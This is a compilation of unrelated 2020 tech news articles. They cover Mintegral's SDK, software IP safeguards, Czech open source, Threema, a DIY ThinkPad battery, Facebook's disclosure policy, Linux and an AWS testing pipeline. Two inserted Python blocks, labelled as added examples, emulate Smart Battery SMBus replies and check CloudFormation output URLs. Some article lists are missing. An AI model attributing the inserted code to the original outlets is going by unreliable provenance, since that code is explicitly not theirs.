Mintegral SDK Going Open-Source For Increased Transparency And Security – PRNewswire

BEIJING, Sept. 4, 2020 /PRNewswire/ -- Following recent allegations raised about the ad data collected by the Mintegral SDK, Mintegral has announced that its SDK will officially become open-source. While Mintegral denies the allegations, the move to open-source the SDK is seen as a way to increase transparency within the ad-tech industry and provide complete visibility into the SDK's inner workings.

The move to an open-source SDK

Mintegral's move to open-source the SDK lets mobile developers read exactly how it works, rather than having to take its behaviour on trust. Since anyone will be able to inspect it (and improve upon it), Mintegral expects the open-source SDK to become more secure: risks can be identified and addressed faster when the code is under constant review by the mobile community. Open code only helps to the extent that what a developer ships matches the published source, so developers integrating the SDK should build it from the published repository or verify that a distributed binary corresponds to a tagged release.

Open-source SDK is the future

Moving to open-source SDKs benefits the whole mobile ad industry, by providing its customers and end-users with increased transparency and security, while further emphasizing features like speed, quality, and customizability. With this move, Mintegral is also encouraging other members of the mobile industry to do the same in order for the entire advertising ecosystem to thrive.

"We are about to move our industry-leading SDK to an open-source environment, and I am excited about the possibilities that come with it, not just for our team, but for all our partners, and ultimately everyone in the mobile ad industry. I believe transparency is a crucial tool towards a stronger and safer industry, and we will work hard to make sure that our partners and our clients will constantly benefit from the highest transparency and security standards available," said Erick Fang, Mintegral CEO.

As the industry demands more transparency from its players, Mintegral believes it's important to provide full clarity around the SDK and its capabilities. From COPPA certification and fighting ad fraud through the adoption of app-ads.txt, to earning Open Measurement SDK certification from IAB Tech Lab and adding support for sellers.json and the SupplyChain object, Mintegral has been a consistent advocate for data privacy, security, and transparency.

What's next?

Mintegral plans to roll out the open-source SDK within the next week and will notify its partners and clients as soon as the change has been made. Mintegral will also release a breakdown of how the SDK operates in a future article. For more news regarding this matter, clients are welcome to reach out to the Mintegral team or follow the Mintegral blog.

SOURCE Mintegral

https://www.mintegral.com/en/

Four Out of Eight Doesn’t Cut It: The IP Safeguards that Most Lawyers Miss When Protecting Software – IPWatchdog.com

Eight safeguards are essential for a full, robust software protection regime. [But most lawyers] only learned about four of them in law school. In today's world, lawyers need to go beyond law school and include real-world, practical solutions to augment the legal protections that are their bread and butter.

Software is an extremely valuable good for those who produce it because it provides value to the software's end users. That value, however, also makes it a target for those who would prefer to obtain the value without compensating the software producer. As a result, as with any valuable asset, software suppliers and Internet of Things (IoT) companies must implement safeguards to protect it. Since software is intellectual property, attorneys who work for or advise software producers are frequently asked how best to protect this valuable asset. (Let's be honest: that is just about every technology company these days, now that hardware manufacturers have joined the desktop, mobile, and SaaS vendors through the ubiquity of their smart devices.) Unfortunately, as discussed below, most lawyers only deliver half of what they should.

Eight safeguards are essential for a full, robust software protection regime. Despite that, most lawyers talk about only four of them. In their defense, they only learned about four of them in law school, which is why that's their go-to advice. But in today's world, lawyers need to go beyond law school and include real-world, practical solutions to augment the legal protections that are their bread and butter. This article will review all eight, but the bulk of the discussion will illustrate the importance and usefulness of the four less-frequently discussed methods.

The first four methods (which lawyers already know about and act on) focus on protecting software from a purely legal perspective:

While each legal protection discussed above is valuable and must be considered, the truth is that the best outcome for the software producer is never having to rely on the legal protections at all. Enforcing legal rights is expensive, time consuming and distracting for a software producer that would much rather focus on developing the next product than on defending the last one. How do you avoid having to rely on the legal protections just laid out? By using technology to prevent the software from being misused or overused, intentionally or unintentionally, in the first place. Below are some practical solutions your clients can deploy:

The final software protection strategy is less about protecting the software producer's rights; it's more about solidifying the foundation of the software producer's products. Most commercial code today relies to some degree (and often to a great degree) on open source software components. Open source software, as referenced above, is code developed by third parties and then incorporated into a software producer's final product. While there's usually no fee charged by the open source provider, the open source code is subject to license obligations that are contractual in nature. Given that this whole article is about how to protect your client's software from misuse, it would be ironic if your client then failed to take the necessary steps to ensure it didn't misuse open source software! Unfortunately, open source software is unmanaged by most companies. On average, software producers are aware of and manage a mere 5% of the open source software used in their products. Failure to fully document and understand open source usage and to comply with the relevant obligations can undo all of the careful work done through the first seven safeguards above. With this in mind, the final safeguard is:

In 1941, baseball's Ted Williams of the Boston Red Sox finished the season with a .406 batting average, meaning he got a hit in 40.6% of his official at bats. In the 79 years since, no one has equaled that feat, heralded as one of baseball's unbreakable records. While that's impressive, it means Mr. Williams failed almost 60% of the time! In the world of software protection, the good news is that most lawyers are out-hitting Ted Williams, usually deploying 50% of the protection schemes available to them. The bad news: 50% isn't cause for celebration. Using the additional four practical protections discussed above is what provides a comprehensive approach to protecting software. Eight out of eight, that's something to celebrate.

Marty Mellican is Vice President and Associate General Counsel at Revenera (formerly known as Flexera's Supplier Division).

Q&A: Open Source advocate David Strejc on why the Czech IT industry is so overpriced – Expats.cz

When the initial wave of news regarding the coronavirus crisis and the response from the Czech government first came out back in March, Expats.cz experienced a surge in traffic that saw our numbers balloon to record highs at peak times. Our news server couldn't handle the volume, and immediately crashed as the traffic spiked.

Thankfully, we had the right support on hand: David Strejc of WPDistro, a Prague-based developer who specializes in WordPress and open source solutions. Since migrating to WPDistro's servers six months ago, our news site hasn't seen any downtime at all.

David is also a long-term advocate of Open Source software solutions, and provides the CRM system AutoCRM, which builds upon a solution used by more than 50,000 companies worldwide.

We recently spoke with David about the Information Technology sector in the Czech Republic, how it compares to the rest of the world, and what's in store for the future.

Hi David! What's your IT background and expertise?

I'm a long-term IT guy, currently 16 years in the IT business. I've worked for two telco providers, O2 and T-Mobile, as IT Architect and Senior Solution Designer, respectively, established the company Easy Software with my partners, and sold my share in it. They are currently providing SaaS around the globe for more than 3000 companies. I was an IT Architect and CTO there.

What about IT here in the Czech Republic?

On one side, we are the fifth biggest software producer in terms of absolute numbers here in the Czech Republic. Companies like Red Hat and others rely on Czech programmers. We are second in some programming skill tests, sometimes behind the Slovaks. We have great people in IT, highly skilled and hard-working.

On the other hand, we are four years behind actual trends in the US.

How can this be?

There is a huge difference between the IT sector and companies which are IT product consumers. Take an average factory or a classic office, for example. They still mentally live in the 90s. And many producers of software here in the Czech Republic make software designed for this kind of mentality. Updates come twice a year, no one answers your email for more than a week, and no one picks up your urgent call for support.

What do you think of world trends in IT compared to the Czech Republic?

Take companies like Facebook, Google, and now even Microsoft. We live in crazy times where the current trend is to deploy software changes, security patches, new features and so on in a matter of days. Sometimes daily. Even more often. This is called CI/CD: continuous integration, continuous deployment.

Is this what makes IT/ICT so expensive: having skilled people push code to production so quickly?

Actually, it is not. It is the opposite. The extreme overpricing of IT here in the Czech Republic, and other countries too, is due to the duplication of work.

Take for example CRM or ERP systems. There are dozens of them. Even here in the Czech Republic we have nearly 50 well-established companies producing the same solutions. And all of them are producing the same thing, reinvented 50 times. Multiply those 50 software solutions by 10 to 20 programmers each, and you get extreme monthly costs.

Isn't that OK? Isn't software about freedom of choice?

Exactly. But when you buy one of those solutions you are done. Your freedom of choice ends when you implement one of these classically-produced software solutions. We have a great example here in the Czech Republic where our Ministry of Finance has nearly 30-year-old software (yes, you read that correctly) running the financing bureaus, thanks to old contracts with IBM, who didn't bother to give us permission to use their software without them (again, you read that correctly). It is still their software; due to their policy we can't simply switch to another supplier.

And it is the same with nearly all of those classic Czech software producers. Duplicating work, catching their customers in a vendor-locking net like fish, and then, like parasites, draining money from them for every patch, every software update, every overpriced feature. Once you are caught you can say goodbye to your IT freedom. Those companies need the money to feed their highly overpriced programmers who are duplicating the same functions as their competitors.

And this leads to high prices for the end consumer.

Its a classic case of reinventing the wheel. But many, many, many times over. And you need many, many, many inventors.

And the HR market is happy. Programmers and IT guys cost a lot of money; HR treats them as a resource or product and delivers them into a company, where they last for two years and then move to another one. Job companies are happy, programmers are happy, and they ask for more and more. The only unhappy one is the final customer, who comes from outside the IT sector.

Not only is the final product highly overpriced, but the customer is also locked into the vendor, and this staffing fluctuation in the IT industry causes even more trouble. Because Franta, lead programmer at ABC Softcorp s.r.o., is suddenly gone. And no one knows what exactly this function is for, or how we will solve that, and now we have to rename half of our code because it is written in Czech (yes, this is still the case; they are naming variables in the Czech language).

Is there an alternative? How is IT made in other countries, like the US?

These days, my long-term predictions are coming true. For 16 years I have been an Open Source advocate. Not because of the price. Not because of the security (it can be proven that OSS is more secure than classic software; take OpenBSD, for example), not because I can dig into code, but because of the resources. Because when we compete too much, we destroy, we die.

Companies like Facebook, Google, LinkedIn and many, many others based in the US (now even Microsoft, which loves Linux and Open Source) have discovered that IT is such a different area that we can produce software that even competitors collaborate on.

Give us an example.

Engineers at Red Hat are producing the OpenShift platform for development, for example. And their customers have dedicated teams of their own engineers sitting in offices or home offices patching, debugging, and improving this huge platform. So customers are helping with their time, money, project management and all that stuff to have better software from their supplier.

And this is across the entire modern IT world. My old way of doing things, the Unix way, is now becoming a reality. IT companies who compete and try to destroy their competitors, like here in the Czech Republic, will die out. Companies that support each other will produce more complex, more stable solutions for less money, which is Open Source software in many cases. MariaDB, which is OSS, says they can replace Oracle, which costs $50,000 for one core per year.

Are there any other advantages of OSS?

You can say, "I don't like you anymore, producer of ABC OSS software. I will take Youngsters Ltd.; they know what they are doing, they are young and full of energy. They pick up my phone after one ring, they answer my emails immediately." And the OSS producer can't say: "You can't do that, it is our licensed software which we are only leasing you. Everything is ours." Now Youngsters Ltd. will take over support and development of the new features. But a whole community of developers is contributing to bug fixes, feature requests, and deciding the best plan for this ABC OSS software.

You don't have to use Microsoft SQL or Oracle, which only add expenses for no value. MariaDB clusters are now used even in mission-critical areas of the banking industry. Facebook runs the biggest cluster of MySQL databases in the world. Imagine what Facebook's bills for Oracle would be if they were using it.

Youve mentioned Facebook do you like what theyre doing?

I am not a big fan of social networks, but I am a big fan of the philosophy. Unix is more of a philosophy than only software. It is a way of doing things. And I love it. Facebook has inspired me in many ways. They produced the first versions of Facebook using the PHP programming language (which many so-called skilled programmers hate) and have used MySQL databases from the beginning. Craziness? I don't think so. PHP programmers were many times cheaper, had more availability, and were easier to hire.

Cheaper and more effective. Open Source from the beginning. Even now Facebook produces Open Source software and gives it to the public, such as React and many others that are not as well known. They also created the Open Compute Project. They give out designs and plans for hardware, servers, racks and so on.

And this is the philosophy of Open Source, Unix, and the original hacker culture. Do it for fun. Do it for the lowest available cost, because we live in an agile world and we want to see a proof of concept in the shortest available time. We don't want to wait a year or two; the whole industry can shift somewhere else. We want a software solution now, so we can put our hands on it and tweak it to fit our needs.

This sounds like an entirely different approach to producing software.

It's actually a very old concept. But when Microsoft, Oracle and others took over the industry in the 80s and 90s with their waterfall methods and postponing of releases, planning years ahead, they changed people's perspectives. Now, pure technology is winning over overpriced business. In 2019, CNBC produced a video about Open Source software taking over the whole industry.

Are you afraid of Open Source? Do you consider it insecure? You are using it daily. It's in your pocket in the form of Android or iOS. When you are browsing the web using Chrome or Firefox as a user, on the other side there is Apache or Nginx, which are both Open Source. More than 60% of virtual machines on Azure are Linux, Facebook runs on MySQL clusters, Google has put their container platform Omega into public form in Kubernetes, and every last one of the top 500 supercomputers in the world runs Linux. The current zeitgeist is Open Source.

And do you produce Open Source in your current company?

We focus on the harder part of Open Source. We provide support, writing the little pieces of code which are not yet available because we are mainly working with WordPress, which is a great example of Open Source taking over the world. WordPress is powering 38% of the top 10,000 websites in the world. It actually powers more than 35% of entire web industry in the world. And its still growing.

This is great example of many developers collaborating on one platform. Microsoft uses WordPress on their news.microsoft.com, Facebook uses it on about.fb.com, the White House is using it, The New York Times, Tech Crunch, and many other big brands.

The advantages are obvious. You can instantly hire a developer who is familiar with the code, with the principles, with the documentation and culture. Web administrators in companies are familiar with the interface they are working in. If your supplier, which can even be us, doesn't suit your communication style, you can search Google for a new one and find them in two minutes.

Is WordPress the only solution you specialize in?

We focus on bigger e-commerce sites and, let's say, high-end WordPress websites for now. But we find our company's brain elsewhere. We have a great Open Source CRM software that is enormously powerful in matters of flexibility, speed, and software philosophy (it is headless, so it can easily be connected with any other application through a REST API). Right now we are building a website to offer this solution to other companies here in the Czech Republic and around Europe.

For more information about WPDistro, and how they can help your online business, visit their official website.

Threema encrypted messaging apps will soon be open source – SlashGear

Threema, an encrypted messaging service that offers a substantial number of features, has announced a big business change that may increase some otherwise skeptical users' trust in the platform. In its announcement, the Threema team said its messaging apps will soon be made fully open source, making it easier to independently review the apps' security and verify their code.

While there's no lack of secure messaging apps on the market, some are more private than others. There are messaging services where messages sit in readable form on the company's servers, and there are end-to-end encrypted services where the company is not able to read its users' messages. Threema falls into the latter category.

Unlike apps like Telegram, which is more targeted at the average consumer, Threema is a higher-end product that includes a variety of features, including support for voice and text messages, groups, distribution lists, and sending files like MP3s and PDFs. As well, users can share locations and images/videos.

When compared alongside the more popular encrypted messaging app Signal, there was both an upside and a downside. The upside? Threema assigns the user a unique ID, eliminating the need to use a phone number. The downside? Threema wasn't open-source, unlike Signal, something that was a concern for some potential users.

In its update on Thursday, Threema announced that it has partnered with Afinum Management AG and that it is making its apps open source. This open-source change applies only to the apps, not the backend, but Threema notes that it has conducted, and will continue to conduct, regular external reviews. Threema also says its users will soon be able to use multiple devices in parallel without compromising their data.

Building An Open Source ThinkPad Battery – Hackaday

If you own a laptop that's got a few years on the clock, you've probably contemplated getting a replacement battery for it. Which means you also know how much legitimate OEM packs cost compared to the shady eBay clones. You can often get two or three of the knock-offs for the same price as a single real battery, but they never last as long as the originals. If they even work properly at all.

Which is why [Alexander Parent] decided to take the road less traveled and scratch-built a custom battery for his ThinkPad T420. By reverse engineering how the battery pack communicates with the computer, he reasoned he would be able to come up with open source firmware that worked at least as well as what the third party packs are running. Which, from the sounds of it, wasn't a very high bar. From a more practical standpoint, it also meant he'd be able to create a higher capacity battery pack than what was commercially available, should he choose to.

A logic analyzer wired in between one of the third party batteries and a spare T420 motherboard allowed [Alexander] to capture all the SMBus chatter between the two. From there he wrote some Arduino code that would mimic a battery as a proof of concept. He was slowed down a bit by an undocumented CRC check, but in the end he was able to come up with a fairly mature firmware that even allows you to provide a custom vendor name and model number for your pack.

The code was shifted over to an ATtiny85, with a voltage divider wired up to one of the pins so it can read the pack voltage. [Alexander] says his firmware still doesn't do a great job of reporting the actual battery capacity remaining, but it's close enough for his purposes. He came up with a simple PCB design to hold the MCU and support components, which he eventually plans on putting inside a 3D printed case that actually plugs into the back of his T420.
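As an added example (not [Alexander]'s firmware and not code from the Hackaday post), the block below shows what the pack-to-laptop conversation most likely looks like at the byte level. It assumes the undocumented CRC is the SMBus Packet Error Code, a CRC-8 with polynomial 0x07 computed over the address and command bytes as well as the data, and it uses the Smart Battery Data Specification's 0x0B address and word-register command codes; the register values are constructed. It builds the three-byte reply an emulated pack must return for a Read Word with PEC enabled, and verifies a reply pulled from a logic-analyzer capture, which is the check you would run to confirm a pack's CRC before blaming your own firmware for a rejected reply.

```python
"""Smart Battery Read Word replies with SMBus PEC (CRC-8).

Added example, not the T420 pack firmware from the post. It assumes the
undocumented CRC is the SMBus Packet Error Code and uses the Smart Battery
Data Specification's address (0x0B) and word-register command codes.
"""
from typing import Dict, Tuple

SBS_ADDR = 0x0B      # 7-bit SMBus address of a Smart Battery
CRC8_POLY = 0x07     # x^8 + x^2 + x + 1, the SMBus PEC polynomial

# Word-sized SBS registers: command code -> (name, unit, signed)
SBS_WORD_REGS: Dict[int, Tuple[str, str, bool]] = {
    0x08: ("Temperature", "0.1 K", False),
    0x09: ("Voltage", "mV", False),
    0x0A: ("Current", "mA", True),      # negative while discharging
    0x0D: ("RelativeStateOfCharge", "%", False),
    0x18: ("DesignCapacity", "mAh", False),
    0x19: ("DesignVoltage", "mV", False),
    0x1C: ("SerialNumber", "", False),
}


def crc8_smbus(data: bytes, crc: int = 0) -> int:
    """SMBus PEC: CRC-8, poly 0x07, init 0, MSB first, no reflection or final XOR."""
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = ((crc << 1) ^ CRC8_POLY) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc


def pec_covered_bytes(addr7: int, command: int, lo: int, hi: int) -> bytes:
    """Everything the PEC covers in a Read Word, in bus order: the write
    address, the command, the read address, then the two data bytes."""
    write_addr = (addr7 << 1) & 0xFE
    return bytes([write_addr, command, write_addr | 1, lo, hi])


def encode_word(value: int, signed: bool = False) -> Tuple[int, int]:
    """Split a register value into (lo, hi) bytes; signed values are two's complement."""
    low_limit, high_limit = (-0x8000, 0x7FFF) if signed else (0, 0xFFFF)
    if not low_limit <= value <= high_limit:
        raise ValueError(f"{value} does not fit a {'signed' if signed else 'unsigned'} 16-bit word")
    word = value & 0xFFFF
    return word & 0xFF, word >> 8


def decode_word(lo: int, hi: int, signed: bool = False) -> int:
    """Inverse of encode_word."""
    word = lo | (hi << 8)
    return word - 0x10000 if signed and word & 0x8000 else word


def _is_signed(command: int) -> bool:
    return SBS_WORD_REGS.get(command, ("", "", False))[2]


def pack_reply(command: int, value: int, addr7: int = SBS_ADDR) -> bytes:
    """The three bytes an emulated pack clocks out for a Read Word with PEC on."""
    lo, hi = encode_word(value, _is_signed(command))
    return bytes([lo, hi, crc8_smbus(pec_covered_bytes(addr7, command, lo, hi))])


def verify_captured_reply(command: int, reply: bytes, addr7: int = SBS_ADDR) -> Tuple[bool, int]:
    """Check a (lo, hi, pec) reply taken from a logic-analyzer capture.
    Returns (pec_ok, decoded_value); a host drops the reply when pec_ok is False."""
    if len(reply) != 3:
        raise ValueError("a Read Word reply with PEC is exactly three bytes")
    lo, hi, pec = reply
    expected = crc8_smbus(pec_covered_bytes(addr7, command, lo, hi))
    return expected == pec, decode_word(lo, hi, _is_signed(command))


if __name__ == "__main__":
    # Constructed values: an 11.1 V pack discharging at 1.5 A.
    for cmd, val in ((0x09, 11100), (0x0A, -1500)):
        reply = pack_reply(cmd, val)
        ok, decoded = verify_captured_reply(cmd, reply)
        name, unit, _ = SBS_WORD_REGS[cmd]
        print(f"{name:<8} reply={reply.hex()} pec_ok={ok} value={decoded} {unit}")
```

The PEC only detects bus corruption; it carries no secret, so nothing in this exchange lets the laptop tell a genuine pack from an emulated one, which is exactly why the firmware can present whatever vendor name and model number it likes. A host that wants that assurance needs an authentication scheme outside what SBS itself provides.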

This project is obviously still in a relatively early stage, but we're very interested to see [Alexander] take it all the way. The ThinkPad has long been the hacker's favorite laptop, and we can think of no machine more worthy of a fully open hardware and software battery pack.

Facebook to warn third-party developers of vulnerable code – TechCrunch

Facebook has announced a policy change that will see the company notify third-party developers if it finds a security vulnerability in their code.

In a blog post announcing the change, Facebook said it "may occasionally find critical bugs and vulnerabilities in third-party code and systems. When that happens, our priority is to see these issues promptly fixed, while making sure that people impacted are informed so that they can protect themselves by deploying a patch or updating their systems."

Facebook has previously notified third-party developers of vulnerabilities, but the policy shift formally codifies the company's approach to disclosing and revealing security vulnerabilities.

Vulnerability disclosure programs, or VDPs, allow companies to set the rules of engagement for finding and disclosing security bugs. VDPs also help guide the disclosure and publication of vulnerabilities once a bug is fixed. Companies often use a bug bounty to pay hackers who follow the companys reporting and disclosure rules.

The policy change is not entirely altruistic. Facebook, like many other tech companies, relies on a ton of third-party code and open-source libraries. But by putting the change in writing, it also puts third-party developers on notice if they dont fix vulnerabilities in a timely fashion.

Casey Ellis, founder and chief technology officer at vulnerability disclosure platform Bugcrowd, said the policy shift was "becoming increasingly popular for companies with a large, user-centric, third-party attack surface," and echoes similar efforts by Atlassian, Google and Microsoft.

Facebook said when it finds a vulnerability, it will give third-party developers 21 days to respond and 90 days to fix the issues, a widely accepted time frame to report and remediate security issues. The company says it will make a reasonable effort to find the right contact for reporting a vulnerability, including, but not limited to, emailing security reporting emails, filing bugs without confidential details in bug trackers or filing support tickets. But the company said it reserves the right to disclose sooner if the vulnerability is actively being exploited by hackers, or delay its disclosure if its agreed that more time is needed to fix an issue.

Facebook said it will generally not sign a non-disclosure agreement (NDA) specific to the security issues it reports.

Katie Moussouris, founder of Luta Security, told TechCrunch that the devil will be in the details.

"The test will be the first time they have to pull the trigger and drop a zero-day with mitigation guidance on a competitor," she said, referring to vulnerabilities disclosed before the affected vendor has had any time to ship a fix.

The new policy is focused specifically on how Facebook handles disclosure of issues in third-party code. If researchers find a security vulnerability on Facebook, or within its family of apps, they will continue to report it through the existing Bug Bounty Program.

As part of the policy change, Facebook said it would also disclose vulnerabilities once they are fixed. In a separate blog post, Facebook, which owns WhatsApp, disclosed six since-fixed vulnerabilities in the messaging app.

The advantages of using Linux – Business Mirror

AS a developing country, the Philippines is always challenged to provide concerned stakeholders all their information and communications technology (ICT) needs to boost the digital capability of the country.

Radenta Technologies Inc., a Filipino-owned computing technology company, recently pointed out that using the Linux operating system is one major way to meet the challenge of the dearth in computing software. "One difference, however, is that Linux is an open source software that is free and available for the public to view, edit and, for those with the technical skill, contribute to. Linux is customizable. You can swap out word processors, web browsers, system display graphics and other user-interface components," the company said in a press statement.

Since it is an open source OS, Linux's source code can be accessed by everyone. Anyone who has coding skills can contribute, modify, enhance and distribute the code to anyone and for any purpose.

Radenta pointed out that IT professionals with Linux skills have a lot of opportunities in fields such as Cloud Computing, Cybersecurity, Networking and IT Infrastructure, Open Source Technologies, Android and Embedded Technologies, and High Performance Computing.

Moreover, Radenta said Linux is also being used in many devices, its code underpinning such popular platforms as Android phones, tablets and Chromebooks, digital storage devices, personal video recorders, cameras, wearables and smart appliances.

Moreover, Microsoft's Windows OS even carries Linux components as part of the Windows Subsystem for Linux (WSL).

Radenta said companies and individuals select Linux for their servers for its security, flexibility and robustness, complemented by excellent support from a community of users worldwide and such global companies as Canonical, the company behind Ubuntu; SUSE and Red Hat, all of which offer commercial support.

Just like other operating systems such as Windows and macOS, Linux has a graphical interface, along with a plethora of applications including a word processor, photo editor, video editor and the like. It is as easy to use as competing OSes.

Radenta said testers can ensure everything works on different configurations of hardware and software, and report when things do not. It added that companies can create their own user interfaces. Meanwhile, writers can create documentation, guides and other copy to go with the software. Translators can make sure that people in different parts of the world can understand the programs and documentation.

Developed by Finnish software engineer Linus Torvalds in 1991, Linux enjoys widespread popularity and support across major sectors. One of the major users of Linux in the Philippines is the University of the Philippines Diliman, which runs Linux as the operating system on its computers.

Radenta said it is offering a Linux training bundle for four persons as part of its campaign to promote Linux. Training starts in October.

Automated CloudFormation Testing Pipeline with TaskCat and CodePipeline – idk.dev

Researchers at Academic Medical Centers (AMCs) use programs such as Observational Health Data Sciences and Informatics (OHDSI) and Research Electronic Data Capture (REDCap) to interact with healthcare data. Our internal team at AWS has provided solutions such as OHDSI-on-AWS and REDCap environments on AWS to help clinicians analyze healthcare data in the AWS Cloud. Occasionally, these solutions break due to a change in some portion of the solution (e.g. updated services). The Automated Solutions Testing Pipeline enables our team to take a proactive approach to discovering these breaks and their cause in order to expedite the repair process.

OHDSI-on-AWS provides these AMCs with the ability to store and analyze observational health data in the AWS cloud. REDCap is a web application for managing surveys and databases with HIPAA-compliant environments. Using our solutions, these programs can be spun up easily on the AWS infrastructure using AWS CloudFormation templates.

Updates to AWS services and other program libraries can cause the CloudFormation template to fail during deployment. Other times, the outputs may not be operating correctly, or the template may not work on every AWS region. This can create a negative customer experience. Some customers may discover this kind of break and decide to not move forward with using the solution. Other customers may not even realize the solution is broken, so they might be unknowingly working with an uncooperative environment. Furthermore, we cannot always provide fast support to the customers who contact us about broken solutions. To meet our teams needs and the needs of our customers, we decided to focus our efforts on taking a CI/CD approach to maintain these solutions. We developed the Automated Testing Pipeline which regularly tests solution deployment and changes to source files.

This post shows the features of the Automated Testing Pipeline and provides resources to help you get started using it with your AWS account.

The Automated Testing Pipeline solution as a whole is designed to automatically deploy CloudFormation templates, run tests against the deployed environments, send notifications if an issue is discovered, and allow for insightful testing data to be easily explored.

CloudFormation templates to be tested are stored in an Amazon S3 bucket. Custom test scripts and TaskCat deployment configuration are stored in an AWS CodeCommit repository.

The pipeline is triggered in one of three ways: an update to the CloudFormation template in S3, an Amazon CloudWatch Events rule, or an update to the testing source code repository. Once the pipeline has been triggered, AWS CodeBuild pulls the source code, deploys the CloudFormation template, tests the deployed environment, and stores the results in an S3 bucket. If any failures are discovered, subscribers to the failure topic are notified. Note that an update to either source (the template bucket or the test repository) causes a deployment under the pipeline's IAM role, so write access to those two sources should be limited to the same people who are allowed to deploy. The following diagram shows its overall architecture.

In order to create the Automated Testing Pipeline, two interns collaborated over the course of five weeks to produce the architecture and custom test scripts. We divided the work of constructing a serverless architecture and writing test scripts for the output URLs of the OHDSI-on-AWS and REDCap environments on AWS.

The following tasks were completed to build out the Automated Testing Pipeline solution:

The architecture can be extended to test any CloudFormation stack. For this particular use case, we wrote the test scripts specifically to test the URLs output by the CloudFormation solutions. The Automated Testing Pipeline has the following features:

The pipeline is triggered automatically when an event occurs. These events include a change to the CloudFormation solution template, a change to the code in the testing repository, and a CloudWatch Events rule that fires on a regular schedule. Additional events can be added in the CloudWatch console.

When the pipeline is triggered, CodeBuild sets up the testing environment. CodeBuild uses a build specification file kept in our source repository to set up the environment and run the test scripts. We created a CodeCommit repository to host the test scripts alongside the build specification. The build specification includes commands to run TaskCat, an open-source tool for testing the deployment of CloudFormation templates. TaskCat can test that the CloudFormation solution deploys, but we needed custom test scripts to ensure that we can interact with the deployed environment as expected. If the template deploys successfully, CodeBuild runs the test scripts against the deployed environment. In our case, the environment is accessed via URLs output by the CloudFormation solution.

We used Selenium WebDriver to interact with the web pages served at the output URLs. This let us programmatically drive a headless web browser in the serverless environment and read the text output by JavaScript functions to determine the state of the test. You can see this interaction occurring in the code snippet below.

We store the test results in JSON format for ease of parsing. TaskCat generates a dashboard, which we customize to display these test results. We insert our JSON results into the dashboard to make it easy to find errors and access log files. This dashboard is a static HTML file that can be hosted in an S3 bucket. In addition, whenever an error occurs, a message containing a link to this dashboard is published to an SNS topic.
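As an added example (not code from the original post or from the Automated Testing Pipeline repository), here is the shape such a custom test script can take in Python. It reads the stack outputs in the format returned by `aws cloudformation describe-stacks`, applies policy checks that matter for endpoints serving health data (HTTPS only, no credentials embedded in the URL, a hostname rather than a raw IP so the certificate can actually be validated), fetches each URL either over verified HTTPS or through a headless browser as the post describes, and writes the JSON result document. The output key names, the stack name, the expected page text and the result schema are assumptions; the post only says that the solutions output URLs.

```python
"""Custom post-deployment checks for a CloudFormation stack's output URLs.

Added example, not code from the idk.dev post or the Automated Testing
Pipeline repository. Assumptions: the stack publishes its web endpoints as
outputs whose keys contain "URL", the checks run from CodeBuild after
`taskcat test run` has succeeded, and the JSON result shape is our own.
"""
import json
import ssl
import urllib.request
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample in the shape of `aws cloudformation describe-stacks`.
SAMPLE_DESCRIBE_STACKS = {
    "Stacks": [{
        "StackName": "example-redcap",  # assumed stack name
        "Outputs": [
            {"OutputKey": "REDCapURL", "OutputValue": "https://redcap.example.com/"},
            {"OutputKey": "AdminURL", "OutputValue": "http://203.0.113.10/admin"},
            {"OutputKey": "DBEndpoint", "OutputValue": "db.example.internal:5432"},
        ],
    }]
}


def extract_output_urls(describe_stacks):
    """Return {OutputKey: OutputValue} for outputs that look like web URLs."""
    urls = {}
    for stack in describe_stacks.get("Stacks", []):
        for out in stack.get("Outputs", []):
            if "URL" in out["OutputKey"].upper() and "://" in out["OutputValue"]:
                urls[out["OutputKey"]] = out["OutputValue"]
    return urls


def static_url_problems(url):
    """Policy checks that need no network; these endpoints carry health data."""
    problems = []
    parsed = urlparse(url)
    if parsed.scheme != "https":
        problems.append("not https")
    if parsed.username or parsed.password:
        problems.append("credentials embedded in URL")
    try:
        ip_address(parsed.hostname or "")
        problems.append("raw IP instead of a hostname (no certificate match possible)")
    except ValueError:
        pass  # a hostname, as expected
    return problems


def http_fetch(url, timeout=15):
    """Default live fetcher: GET with chain and hostname verification."""
    ctx = ssl.create_default_context()
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
        return resp.status, resp.read(65536).decode("utf-8", "replace")


def browser_fetch(url, timeout=30):
    """Headless-browser fetcher, as the post does with Selenium. Imported
    lazily so the static checks run without a browser installed. WebDriver
    does not expose the HTTP status, so 200 is reported and the body text
    carries the verdict."""
    from selenium import webdriver
    from selenium.webdriver.chrome.options import Options
    from selenium.webdriver.common.by import By
    opts = Options()
    opts.add_argument("--headless")
    opts.add_argument("--no-sandbox")  # needed inside CodeBuild containers
    driver = webdriver.Chrome(options=opts)
    try:
        driver.set_page_load_timeout(timeout)
        driver.get(url)
        return 200, driver.find_element(By.TAG_NAME, "body").text
    finally:
        driver.quit()


def run_checks(describe_stacks, expected_text, fetcher=http_fetch):
    """Check every output URL; return the JSON-serialisable result document."""
    results = []
    for key, url in extract_output_urls(describe_stacks).items():
        problems = static_url_problems(url)
        if not problems:  # only talk to endpoints that passed policy
            try:
                status, body = fetcher(url)
                if status != 200:
                    problems.append(f"HTTP {status}")
                elif expected_text not in body:
                    problems.append(f"expected text {expected_text!r} not found")
            except Exception as exc:  # DNS, TLS, timeout: all count as failures
                problems.append(f"fetch error: {exc.__class__.__name__}")
        results.append({"output": key, "url": url,
                        "status": "FAIL" if problems else "PASS",
                        "problems": problems})
    return {"failed": sum(r["status"] == "FAIL" for r in results), "tests": results}


if __name__ == "__main__":
    import sys
    # In CodeBuild: aws cloudformation describe-stacks --stack-name ... > stacks.json
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            stacks = json.load(fh)
    else:
        stacks = SAMPLE_DESCRIBE_STACKS
    report = run_checks(stacks, expected_text="REDCap")
    json.dump(report, sys.stdout, indent=2)
    sys.exit(1 if report["failed"] else 0)  # non-zero fails the CodeBuild phase
```

The non-zero exit is what turns a failed check into a failed CodeBuild phase, and so into the notification described above; the policy checks run before any network call so that a misconfigured endpoint fails fast without the script ever sending a request over plain HTTP.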

In true CI/CD fashion, this end-to-end design automatically performs tasks that would otherwise be performed manually. We have shown how deploying solutions, testing solutions, notifying maintainers, and providing a results dashboard are all actions handled entirely by the Automated Testing Pipeline.

Prerequisite tasks to complete before deploying the pipeline:

